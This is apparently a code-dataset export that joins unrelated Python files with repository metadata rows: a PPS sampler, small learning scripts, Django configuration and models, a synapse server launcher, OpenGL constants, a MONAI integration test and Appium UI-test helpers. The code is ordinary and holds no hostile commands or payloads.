def subset_pps5(self, nsamp):
"""
Return a sample of nsamp distinct items from the population, sampled
without replacement with probability proportional to size (PPS)
according to Sampford's sampling scheme.
5-table lookup samplers are used within Sampford's algorithm to
accelerate the sampling for large populations.
"""
# Copy the whole population if nsamp = npopn.
if nsamp == self.npopn:
return [item for item in self.items]
set_rng_state(*random.get_state())
if self.equiprob:
pool = arange(self.npopn)
indices = equalprob(nsamp, pool)
else:
# This part of setup has to be done before any sampling.
if not self.did_init:
print('Initing ppssampler...')
self.sampler = _ppssampler(self.weights)
self.did_init = True
# This part has to be done before any sampling w/o replacement.
if not self.did_Sampford_init:
print('Initing wts...')
self.sort_indices, self.sort_wts, self.tot_wt = \
self.sampler.prepwts(self.weights)
self.max_wt = self.sort_wts[0]/self.tot_wt # Max wt, normed
self.nsamp = 0
self.did_Sampford_init = True
# This part has to be done when sample size changes.
if self.nsamp != nsamp:
print('Initing ratios...')
if nsamp > self.npopn:
raise ValueError('nsamp larger than population size!')
if nsamp*self.max_wt > 1:
raise ValueError('Sample size too large for PPS sampling!')
self.sampler.prepratios(nsamp, self.sort_wts, self.tot_wt)
self.sampler.prepratiotables()
self.did_Sampford_tables = True
self.nsamp = nsamp
# This may happen if subset_pps is called before subset_pps5.
if not self.did_Sampford_tables:
print('Initing ratio tables...')
self.sampler.prepratiotables()
self.did_Sampford_tables = True
self.ntry, indices = self.sampler.samplenr5()
# Note the 5-table version returns unsorted indices.
# indices = [self.sort_indices[i] for i in sindices]
result = [self.items[i] for i in indices]
random.set_state(get_rng_state())
return result
class Population1D(Population):
"""
A Population object specialized for populations indexed by a
single (1-D) real-valued quantity that gives the "size" of
each member.
"""
def __init__(self, vals, weights, err=None):
indices = array(vals).argsort()
self.vals = vals[indices].copy()
self.weights = array(weights)[indices].copy()
if err == None:
self.err = None
else:
self.err = array(err)[indices].copy()
Population.__init__(self, self.vals, self.weights)
self.cdf = self.weights.cumsum()
self.hazard = self.cdf[::-1].copy()
def haz_pts(self, start=None, end=None):
"""
Return arrays of points specifying the hazard dist'n over the range
[start, end]. The range must fully span the range of
detected values. Also return arrays of points specifying
error bars, if defined on creation.
"""
if start is None:
start = self.vals[0]
if end is None:
end = self.vals[-1]
if start>self.vals[0] or end<self.vals[-1]:
raise ValueError('Range must span the range of sampled values!')
# Start the descending CDF.
absc, ord = [start], [1.]
# Add pairs of points for each uncensored value, defining jumps.
for x, p in zip(self.vals, self.hazard):
absc.extend([x, x])
ord.extend([ord[-1], p])
# The last step is zero.
absc.append(end)
ord.append(0.)
if self.err == None:
return array(absc), array(ord)
else:
# For error bars, just copy the stored errors in the middle of
# the CDF bins.
eabsc = []
for i in range(len(self.vals)-1):
eabsc.append( .5*(self.vals[i]+self.vals[i+1]) )
eabsc.append( .5*(self.vals[-1]+end) )
return array(absc), array(ord), array(eabsc), self.hazard.copy(), \
self.err.copy()
def plot(self, start=None, end=None):
"""
Plot the hazard over the range [start,end], which must span
the range of uncensored values.
"""
if not pl:
raise RuntimeError('Cannot plot without pylab!')
if start is None:
start = self.vals[0]
if end is None:
end = self.vals[-1]
if self.err == None:
a, o = self.haz_pts(start, end)
else:
a, o, ea, eo, ee = self.haz_pts(start, end)
pl.plot(a, o, 'b-', linewidth=2)
if self.err != None:
pl.errorbar(ea, eo, ee, fmt='o', markersize=0)
| [
"[email protected]"
] | |
fc65babef9b7d7077b94f35d2c17bcd73e6ea202 | ac305c6739541e84857e297f8eb1b19417978548 | /78.py | 669cd4df43e886cd23adf6230f54103530d8dd28 | [] | no_license | imhardikj/git_test | d6608d6c02e0bc454f9dd31ffbbc5704a7046a61 | 43f0de2e9ac09ecd4fdfee27879fd8ae354a0685 | refs/heads/master | 2020-03-27T21:56:46.394739 | 2018-09-03T11:27:58 | 2018-09-03T11:27:58 | 147,189,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | def greet_user(username):
"""Display a simple greeting."""
print("Hello, " + username.title() + "!")
greet_user('jesse')
| [
"[email protected]"
] | |
b92c943549a132c92ed17f40a08639a3e024897f | 106983cf0b8df622f514ecff2bb2fa4c794c9dac | /Misc/Raspberry Pi Things/Motors/stringComparison.py | c9d425c4e5b4eeabd02957268eb17c72dcf90889 | [] | no_license | michael5486/Senior-Design | 2d9ae521c637abf7c0825f85b32752ad61c62744 | 6b6c78bed5f20582a9753a9c10020c709d6b6e53 | refs/heads/master | 2021-01-19T09:58:35.378164 | 2017-05-26T17:17:13 | 2017-05-26T17:17:13 | 67,556,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | testVar = None
run = True
while run == 1:
testVar = raw_input("Ask user for something.\n")
if testVar == "exit":
run = False
print "System Exiting..."
else:
print testVar | [
"[email protected]"
] | |
5b9c1aae3f26483755e82ecbe9dbc62f68a649ff | 9a343c495459e79dc408a102730bcaeac7fa8886 | /chapter9/SuperMattAdmin/ModelForm/urls.py | e330642ce8f8b5b0fcd8f30304a21a71719bd6f6 | [
"MIT"
] | permissive | MMingLeung/Python_Study | 62d3ae92bf6760de0804aa5792f53fb3799486a2 | 4ff1d02d2b6dd54e96f7179fa000548936b691e7 | refs/heads/master | 2022-12-27T12:53:05.186800 | 2018-03-07T04:34:36 | 2018-03-07T04:34:36 | 92,124,981 | 3 | 1 | MIT | 2021-06-10T18:35:33 | 2017-05-23T03:28:52 | JavaScript | UTF-8 | Python | false | false | 1,316 | py | """ModelForm URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from app01 import views
from supermatt.service import test_v1
urlpatterns = [
# url(r'^admin/', admin.site.urls),
# include 如果参数是模块路径,导入模块找urlpatterns变量,获取列表
# url(r'^test/$', include('app01.urls')),
# 可以这样写
# url(r'^test/$', ([
# url(r'^test/', views.test),
# url(r'^test/', views.test),
# url(r'^test/', views.test),
# ],'app_name','name_space')),
url(r'^su/', test_v1.site.urls),
url(r'^test/', views.test),
url(r'^test2/', views.test2),
]
| [
"[email protected]"
] | |
a14a08ab5d69e160bff8619e5fa0c565a6878d76 | 03b30e760f571e309ab1539edbc24ce0ff47c141 | /cyly/test1.py | 0ee1339e5bbd9f9f590df225b40d8211bac483c9 | [] | no_license | latata666/newcoder | 548f32ab3acd75b592ce7f7b399ecdf340e747d8 | e9206ab924899a2985bece312777e3b5d55c6f60 | refs/heads/master | 2022-12-12T22:46:03.255804 | 2020-08-31T02:27:17 | 2020-08-31T02:27:17 | 263,274,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 876 | py | # -*- coding: utf-8 -*-
# @Time : 2020/5/15 10:41
# @Author : Mamamooo
# @Site :
# @File : test1.py
# @Software: PyCharm
"""
"""
import logging
# create logger with 'spam_application'
logger = logging.getLogger('spam_application')
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug messages
fh = logging.FileHandler('spam.log')
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.ERROR)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
logger.info('creating an instance of auxiliary_module.Auxiliary')
logger.info('done with auxiliary_module.some_function()') | [
"[email protected]"
] | |
856e9c0036931f4496353a90a125e2e2e94829e8 | 95aa5a5c10ad18195d7f92e37265d9dff06debe6 | /synapse/tools/server.py | 55efd5ecbd42ae28f7f5bd3ea0aa56bb306baf18 | [
"Apache-2.0"
] | permissive | drstrng/synapse | 2679f7c23221ad7d8fd2fbb4745bdcd5275843da | 3901f17601821aa0e8b6de4de434309d465fbba2 | refs/heads/master | 2021-01-17T22:02:29.833824 | 2015-09-01T18:56:57 | 2015-09-01T18:56:57 | 40,968,669 | 0 | 0 | null | 2015-08-18T11:40:51 | 2015-08-18T11:40:50 | Python | UTF-8 | Python | false | false | 1,358 | py | import sys
import argparse
import importlib
import synapse.link as s_link
import synapse.cortex as s_cortex
import synapse.daemon as s_daemon
def main(argv):
p = argparse.ArgumentParser(prog='server')
p.add_argument('--initmod',help='python module name for daemon init callback')
p.add_argument('--cortex', action='append', default=[], help='cortex name,url to share for RMI')
p.add_argument('linkurl',nargs='+',help='link urls to bind/listen')
opts = p.parse_args(argv)
daemon = s_daemon.Daemon()
# possibly load/share a cortex or two
for nameurl in opts.cortex:
name,url = nameurl.split(',',1)
core = s_cortex.openurl(url)
daemon.addSharedObject(name,core)
# fire up requested link servers
for url in opts.linkurl:
link = s_link.chopLinkUrl(url)
daemon.runLinkServer(link)
if opts.initmod:
mod = importlib.import_module(opts.initmod)
meth = getattr(mod,'initDaemon',None)
if meth == None:
print('error: initmod (%s) has no initDaemon() function!')
return
# call back the daemon init module
meth(daemon)
try:
daemon.wait()
except KeyboardInterrupt as e:
print('ctrl-c caught: shutting down')
daemon.fini()
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| [
"[email protected]"
] | |
83fb210fa070a1486e7d0d70933f5079a00249e4 | 82fce9aae9e855a73f4e92d750e6a8df2ef877a5 | /Lab/venv/lib/python3.8/site-packages/OpenGL/raw/GLES2/EXT/sRGB.py | 8f6425aa57802b0bcff7a9f104b0879ff0ac08bc | [] | no_license | BartoszRudnik/GK | 1294f7708902e867dacd7da591b9f2e741bfe9e5 | 6dc09184a3af07143b9729e42a6f62f13da50128 | refs/heads/main | 2023-02-20T19:02:12.408974 | 2021-01-22T10:51:14 | 2021-01-22T10:51:14 | 307,847,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p
from OpenGL.constant import Constant as _C
# Code generation uses this
# End users want this...
from OpenGL.raw.GLES2 import _errors
_EXTENSION_NAME = 'GLES2_EXT_sRGB'
def _f(function):
return _p.createFunction(function, _p.PLATFORM.GLES2, 'GLES2_EXT_sRGB', error_checker=_errors._error_checker)
GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT = _C('GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT', 0x8210)
GL_SRGB8_ALPHA8_EXT = _C('GL_SRGB8_ALPHA8_EXT', 0x8C43)
GL_SRGB_ALPHA_EXT = _C('GL_SRGB_ALPHA_EXT', 0x8C42)
GL_SRGB_EXT=_C('GL_SRGB_EXT',0x8C40)
| [
"[email protected]"
] | |
9f5c3c2ae5e766b560ed33641653dcbbff6eedfb | b2fef77e77f77b6cfd83da4ec2f89cbe73330844 | /tests/test_integration_lazy_samples.py | c365616bc84723bb5c8013fdcf4d08ed6e238a58 | [
"Apache-2.0"
] | permissive | Project-MONAI/MONAI | 8ef2593cc5fd1cd16e13464f927fe563fe3f5bac | e48c3e2c741fa3fc705c4425d17ac4a5afac6c47 | refs/heads/dev | 2023-09-02T00:21:04.532596 | 2023-09-01T06:46:45 | 2023-09-01T06:46:45 | 214,485,001 | 4,805 | 996 | Apache-2.0 | 2023-09-14T15:19:30 | 2019-10-11T16:41:38 | Python | UTF-8 | Python | false | false | 9,193 | py | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import os
import shutil
import tempfile
import unittest
from glob import glob
import nibabel as nib
import numpy as np
import torch
import monai
import monai.transforms as mt
from monai.data import create_test_image_3d, decollate_batch
from monai.transforms.utils import has_status_keys
from monai.utils import TraceStatusKeys, set_determinism
from tests.utils import HAS_CUPY, DistTestCase, SkipIfBeforePyTorchVersion, skip_if_quick
def _no_op(x):
return x
def run_training_test(root_dir, device="cuda:0", cachedataset=0, readers=(None, None), num_workers=4, lazy=True):
print(f"test case: {locals()}")
images = sorted(glob(os.path.join(root_dir, "img*.nii.gz")))
segs = sorted(glob(os.path.join(root_dir, "seg*.nii.gz")))
train_files = [{"img": img, "seg": seg} for img, seg in zip(images[:20], segs[:20])]
device = "cuda:0" if HAS_CUPY and torch.cuda.is_available() else "cpu" # mode 0 and cuda requires CUPY
num_workers = 0 if torch.cuda.is_available() else num_workers
# define transforms for image and segmentation
lazy_kwargs = {
"img": {"mode": "bilinear", "device": device, "padding_mode": "border", "dtype": torch.float32},
"seg": {"mode": 0, "device": device, "padding_mode": "nearest", "dtype": torch.uint8},
}
train_transforms = mt.Compose(
[
mt.LoadImaged(keys=["img", "seg"], reader=readers[0], image_only=True),
mt.EnsureChannelFirstd(keys=["img", "seg"]),
mt.Spacingd(
keys=["img", "seg"],
pixdim=[1.2, 0.8, 0.7],
mode=["bilinear", 0],
padding_mode=("border", "nearest"),
dtype=np.float32,
),
mt.Orientationd(keys=["img", "seg"], axcodes="ARS"),
mt.RandRotate90d(keys=["img", "seg"], prob=1.0, spatial_axes=(1, 2)),
mt.ScaleIntensityd(keys="img"),
mt.ApplyPendingd(keys=["seg"]),
mt.RandCropByPosNegLabeld(
keys=["img", "seg"], label_key="seg", spatial_size=[76, 82, 80], pos=1, neg=1, num_samples=4
),
mt.RandRotate90d(keys=["img", "seg"], prob=0.8, spatial_axes=(0, 2)),
mt.RandZoomd(
keys=["img", "seg"], prob=1.0, min_zoom=1.0, max_zoom=1.0, mode=("trilinear", 0), keep_size=True
),
mt.ResizeWithPadOrCropD(keys=["img", "seg"], spatial_size=[80, 72, 80]),
mt.Rotated(keys=["img", "seg"], angle=[np.pi / 2, np.pi / 2, 0], mode="nearest", keep_size=False),
mt.Lambdad(keys=["img"], func=_no_op),
],
lazy=lazy,
overrides=lazy_kwargs,
log_stats=num_workers > 0,
)
# create a training data loader
if cachedataset == 2:
train_ds = monai.data.CacheDataset(
data=train_files, transform=train_transforms, cache_rate=0.8, runtime_cache=False, num_workers=0
)
elif cachedataset == 3:
train_ds = monai.data.LMDBDataset(data=train_files, transform=train_transforms, cache_dir=root_dir)
else:
train_ds = monai.data.Dataset(data=train_files, transform=train_transforms)
# create UNet, DiceLoss and Adam optimizer
model = monai.networks.nets.UNet(
spatial_dims=3, in_channels=1, out_channels=1, channels=(2, 2, 2, 2), strides=(2, 2, 2), num_res_units=2
).to(device)
optimizer = torch.optim.Adam(model.parameters(), 5e-4)
loss_function = monai.losses.DiceLoss(sigmoid=True)
saver = mt.SaveImage(
output_dir=os.path.join(root_dir, "output"),
dtype=np.float32,
output_ext=".nii.gz",
output_postfix=f"seg_{lazy}_{num_workers}",
mode="bilinear",
resample=False,
separate_folder=False,
print_log=False,
)
inverter = mt.Invertd(
keys="seg", orig_keys="img", transform=mt.Compose(train_transforms.transforms[-5:]), to_tensor=True
)
# use batch_size=2 to load images and use RandCropByPosNegLabeld to generate 2 x 4 images for network training
_g = torch.Generator()
_g.manual_seed(0)
set_determinism(0)
train_loader = monai.data.DataLoader(
train_ds, batch_size=1, shuffle=True, num_workers=num_workers, generator=_g, persistent_workers=num_workers > 0
)
all_coords = set()
batch_data = None
for epoch in range(5):
print("-" * 10)
print(f"Epoch {epoch + 1}/5")
for step, batch_data in enumerate(train_loader, start=1):
inputs, labels = batch_data["img"].to(device), batch_data["seg"].to(device)
optimizer.zero_grad()
outputs = model(inputs)
loss = loss_function(outputs, labels)
loss.backward()
optimizer.step()
epoch_len = len(train_ds) // train_loader.batch_size
print(f"{step}/{epoch_len}, train_loss:{loss.item():0.4f}")
for item, in_img, in_seg in zip(outputs, inputs, labels): # this decollates the batch, pt 1.9+
item.copy_meta_from(in_img)
np.testing.assert_array_equal(item.pending_operations, [])
np.testing.assert_array_equal(in_seg.pending_operations, [])
ops = [0]
if len(item.applied_operations) > 1:
found = False
for idx, n in enumerate(item.applied_operations): # noqa
if n["class"] == "RandCropByPosNegLabel":
found = True
break
if found:
ops = item.applied_operations[idx]["extra_info"]["extra_info"]["cropped"]
img_name = os.path.basename(item.meta["filename_or_obj"])
coords = f"{img_name} - {ops}"
print(coords)
# np.testing.assert_allclose(coords in all_coords, False)
all_coords.add(coords)
saver(item) # just testing the saving
saver(in_img)
saver(in_seg)
invertible, reasons = has_status_keys(batch_data, TraceStatusKeys.PENDING_DURING_APPLY)
inverted = [inverter(b_data) for b_data in decollate_batch(batch_data)] # expecting no error
return ops
@skip_if_quick
@SkipIfBeforePyTorchVersion((1, 11))
class IntegrationLazyResampling(DistTestCase):
def setUp(self):
monai.config.print_config()
set_determinism(seed=0)
self.data_dir = tempfile.mkdtemp()
for i in range(3):
im, seg = create_test_image_3d(128, 128, 128, num_seg_classes=1, channel_dim=-1)
n = nib.Nifti1Image(im, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"img{i:d}.nii.gz"))
n = nib.Nifti1Image(seg, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"seg{i:d}.nii.gz"))
self.device = "cuda:0" if torch.cuda.is_available() else "cpu:0"
def tearDown(self):
set_determinism(seed=None)
shutil.rmtree(self.data_dir)
def train_and_infer(self, idx=0):
results = []
_readers = (None, None)
_w = 2
if idx == 1:
_readers = ("itkreader", "itkreader")
_w = 1
elif idx == 2:
_readers = ("itkreader", "nibabelreader")
_w = 0
results_expected = run_training_test(
self.data_dir, device=self.device, cachedataset=0, readers=_readers, num_workers=_w, lazy=False
)
results = run_training_test(
self.data_dir, device=self.device, cachedataset=idx, readers=_readers, num_workers=_w, lazy=True
)
self.assertFalse(np.allclose(results, [0]))
self.assertFalse(np.allclose(results_expected, [0]))
np.testing.assert_allclose(results, results_expected)
lazy_files = glob(os.path.join(self.data_dir, "output", "*_True_*.nii.gz"))
regular_files = glob(os.path.join(self.data_dir, "output", "*_False_*.nii.gz"))
diffs = []
for a, b in zip(sorted(lazy_files), sorted(regular_files)):
img_lazy = mt.LoadImage(image_only=True)(a)
img_regular = mt.LoadImage(image_only=True)(b)
diff = np.size(img_lazy) - np.sum(np.isclose(img_lazy, img_regular, atol=1e-4))
diff_rate = diff / np.size(img_lazy)
diffs.append(diff_rate)
np.testing.assert_allclose(diff_rate, 0.0, atol=0.03)
print("volume diff:", diffs)
def test_training(self):
for i in range(4):
self.train_and_infer(i)
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
ce7936e9279838ce773a5d1c8ec644b1ab44048f | ce55c319f5a78b69fefc63595d433864a2e531b5 | /前后端分离-vue-DRF/Projects-lenongke/LNK/apps/users/signals.py | 43a056d613cf142a3a112d980f3a8db7cfac5f0d | [] | no_license | Suijng/1809_data | a072c875e8746190e3b715e53f1afe3323f4666b | 45f8a57089f5c30ccc1a3cddb03b76dc95355417 | refs/heads/master | 2022-12-21T12:38:30.458291 | 2019-09-27T01:14:41 | 2019-09-27T01:14:41 | 211,207,071 | 0 | 0 | null | 2022-11-22T03:16:18 | 2019-09-27T00:55:21 | HTML | UTF-8 | Python | false | false | 579 | py | # post_save Django中的model对象保存后,自动触发
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth import get_user_model
# 获取用户模型
User = get_user_model()
@receiver(post_save,sender=User) # 监控用户User模型
def create_user(sender,instance=None,created=False,**kwargs):
# created: 表示是否已经创建
if created:
# 获取用户的密码
password = instance.password
# 加密
instance.set_password(password)
# 保存
instance.save() | [
"[email protected]"
] | |
99bdd4f3712583d0eca467f97b1c076141596f60 | 7edafb8e10c31bffd12420a4cee61d0a841fd226 | /YunluFramework/public/handle/renmai/RENMAIHANDLE5.py | c53467af7c700dc0002bde67039eec60351ee5c0 | [] | no_license | xiao2912008572/Appium | ca11d2cf82f9dcc051e9b719eb09f862f07621bf | 3931957a8ae9b4ee2acc13ae4aba0ba46b6d842b | refs/heads/master | 2021-01-21T12:27:36.243484 | 2018-09-12T09:25:35 | 2018-09-12T09:25:35 | 102,071,447 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 9,492 | py | __author__ = 'Administrator'
from YunluFramework.public.handle.renmai.RENMAIHANDLE4 import RENMAIHANDLE4
class RENMAIHANDLE5(RENMAIHANDLE4):
#*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-设置:RMSY_search_label_groupchat_menu_setting*********************************
#定位:人脉首页-搜索-标签列表-点击进入群聊-设置-群头像:点击
def RMSY_search_label_groupchat_menu_setting_grouphead_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu_setting_grouphead)
#定位:人脉首页-搜索-标签列表-点击进入群聊-设置-返回:点击
def RMSY_search_label_groupchat_menu_setting_back_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu_setting_back)
#定位:人脉首页-搜索-标签列表-点击进入群聊-设置-群名称:点击
def RMSY_search_label_groupchat_menu_setting_groupname_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu_setting_groupname)
#*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-热度设置:RMSY_search_label_groupchat_menu_heatsetting*********************************
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-返回:点击
def RMSY_search_label_groupchat_menu_heatsetting_back_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_back)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-消息:点击
def RMSY_search_label_groupchat_menu_heatsetting_msg_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_msg)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-飘泡:点击
def RMSY_search_label_groupchat_menu_heatsetting_bubble_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_bubble)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-震动:点击
def RMSY_search_label_groupchat_menu_heatsetting_shock_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_shock)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-铃声:点击
def RMSY_search_label_groupchat_menu_heatsetting_bell_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_bell)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-确定:点击
def RMSY_search_label_groupchat_menu_heatsetting_confirm_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_confirm)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-周期:点击
def RMSY_search_label_groupchat_menu_heatsetting_period_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_period)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-时段:点击
def RMSY_search_label_groupchat_menu_heatsetting_time_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_time)
#*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-人群按钮:RMSY_search_label_groupchat_groupbtn*********************************
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-返回:点击
def RMSY_search_label_groupchat_groupbtn_back_click(self):
return self.p.click(self.RMSY_search_label_groupchat_groupbtn_back)
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-联系人列表:点击
def RMSY_search_label_groupchat_groupbtn_Contacts_click(self, n):
return self.p.clicks(self.RMSY_search_label_groupchat_groupbtn_Contacts,n)
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-消息输入框:输入
def RMSY_search_label_groupchat_groupbtn_msginput_sendkeys(self, msg):
return self.p.send_keys(self.RMSY_search_label_groupchat_groupbtn_msginput, msg)
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-消息按钮:点击
def RMSY_search_label_groupchat_groupbtn_msgbtn_click(self):
return self.p.click(self.RMSY_search_label_groupchat_groupbtn_msgbtn)
#*********************************【PAGE3】人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期:RMSY_contacts_menu_heatsetting_p2pconversation_period*********************************
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-返回:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_back_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_back)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-每天:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_everyday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_everyday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-工昨日:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_workday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_workday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-节假日:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_holiday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_holiday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-择日:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_selectday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_selectday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-保存:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_save_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_save)
#*********************************【PAGE3】人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段:RMSY_contacts_menu_heatsetting_p2pconversation_time*********************************
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段-确定:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_time_confirm_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_time_confirm)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段-取消:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_time_cancel_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_time_cancel)
#*********************************【PAGE3】人脉首页-点击联系人-消息-热度设置-周期:RMSY_contacts_msg_menu_heatsetting_period*********************************
#定位:人脉首页-点击联系人-消息-热度设置-周期-返回:点击
def RMSY_contacts_msg_menu_heatsetting_period_back_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_back)
#定位:人脉首页-点击联系人-消息-热度设置-周期-每天:点击
def RMSY_contacts_msg_menu_heatsetting_period_everyday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_everyday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-工昨日:点击
def RMSY_contacts_msg_menu_heatsetting_period_workday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_workday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-节假日:点击
def RMSY_contacts_msg_menu_heatsetting_period_holiday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_holiday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-择日:点击
def RMSY_contacts_msg_menu_heatsetting_period_selectday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_selectday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-保存:点击
def RMSY_contacts_msg_menu_heatsetting_period_save_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_save)
#*********************************【PAGE4】人脉首页-点击联系人-消息-热度设置-时段:RMSY_contacts_msg_menu_heatsetting_time*********************************
#定位:人脉首页-点击联系人-消息-热度设置-时段-确定:点击
def RMSY_contacts_msg_menu_heatsetting_time_confirm_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_time_confirm)
#定位:人脉首页-点击联系人-消息-热度设置-时段-取消:点击
def RMSY_contacts_msg_menu_heatsetting_time_cancel_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_time_cancel) | [
"[email protected]"
] | |
1489a49a4e6ccd3697af23f1e682ca9574953838 | efe6c52938fe5c7a259514ad317484057edfeff7 | /tube/models.py | 7526f1fa46150f5b12037f9489d41f329289eb0d | [] | no_license | seiya0723/video_site_02 | 69413879248a2cc314dd5c83c9bedb564e170aba | 5ffcccb1f64b83bb3bf1c9bfd42c9896ff28eb85 | refs/heads/master | 2023-03-31T21:02:25.877950 | 2021-04-14T00:45:14 | 2021-04-14T00:45:14 | 357,728,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | from django.db import models
from django.utils import timezone
class Video(models.Model):
class Meta:
db_table = "video"
title = models.CharField(verbose_name="タイトル", max_length=30)
comment = models.CharField(verbose_name="動画説明文", max_length=2000)
dt = models.DateTimeField(verbose_name="投稿日", default=timezone.now)
def __str__(self):
return self.title | [
"seiya@asahina"
] | seiya@asahina |
bfba43a40c44ed33df829ed9cd1755d9c69e70f7 | 736250d9d14552c5fa0aca25b25d9c8a28fcd1a0 | /sssionpro/manage.py | 3b9b39fa5263b2fcca0a11cb1b35b13a433a6d39 | [] | no_license | maheswatapradhan/feedback | 57f052a2082902cb8a72b474e0b863b7a00d1c9c | 31c7dcb113a38e29b3a56481fcb9ae2fce7d61a2 | refs/heads/master | 2020-09-15T23:42:32.041306 | 2019-11-23T12:54:25 | 2019-11-23T12:54:25 | 223,585,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
